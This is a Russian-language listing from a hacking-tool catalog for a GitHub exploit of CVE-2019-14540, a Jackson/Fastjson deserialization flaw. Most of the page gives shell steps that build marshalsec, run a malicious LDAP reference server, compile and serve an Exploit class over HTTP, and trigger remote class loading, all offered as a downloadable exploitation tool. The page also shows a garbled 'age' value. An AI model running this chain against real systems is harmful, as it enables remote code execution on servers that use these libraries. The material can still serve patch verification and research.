Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2019-14540-exploit — CVE-2019-14540 Exploit | Kitploit
Инструменты/GitHubGitHub/leadroyal/cve-2019-14540-exploit
Динамический анализ (песочница)Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubleadroyal/cve-2019-14540-exploit

cve-2019-14540-exploit

CVE-2019-14540 Exploit

Репозиторий
21957 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплуатация CVE-2019-14540

http://www.leadroyal.cn/?p=939

Ограничения среды: поскольку в этом демо используется JNDI LDAP эксплуатация, необходимо использовать низкую версию JDK (меньше 8u191).

1. Использование marshalsec для создания LDAP-сервиса на локальном порту 1389, указывающего на HTTP-сервис на порту 8000

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389

2. Компиляция кода для удаленной загрузки в remote_codebase

root@kitploit:~
cd remote_codebase
javac Exploit.java

3. Запуск HTTP-сервиса на локальном порту 8000 в remote_codebase

root@kitploit:~
cd remote_codebase
python -m SimpleHTTPServer
Скачать инструмент

4. Запуск Main.java для триггера уязвимости через десериализацию Jackson и Fastjson

demo.png